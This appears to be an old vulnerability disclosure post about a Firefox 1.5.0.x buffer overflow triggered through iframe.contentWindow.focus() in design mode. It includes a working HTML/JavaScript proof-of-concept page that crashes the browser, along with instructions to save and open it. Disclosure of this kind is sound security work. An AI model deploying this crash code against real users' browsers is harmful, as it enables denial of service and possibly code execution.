Firefox Code Execution!

Improper handling of Javascript content allows attackers to execute arbitrary code and crash Mozilla Firefox.

Software:
Firefox Web Browser

Tested:

Linux, Windows clients' version 1.5.0.2
* refreshing the page several times on firefox version 1.5.0.3 crashes the browser

Result:
Firefox Remote Code Execution and Denial of Service – Vendor contacted, no patch yet.

Problem:

A handling issue exists in how Firefox handles certain Javascript in js320.dll and xpcom_core.dll
regarding iframe.contentWindow.focus(). By manipulating this feature a buffer overflow will occur.

Proof of Concept:
http://www.securident.com/vuln/ffdos.htm
Credits:

splices(splices [dot] org)
spiffomatic64(spiffomatic64 [dot] com)
Securident Technologies (securident [dot] com)

[CODE]

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>

<!–EOF –>

save the file in html format and veiw in the firefox browser.

Advertisements

About this entry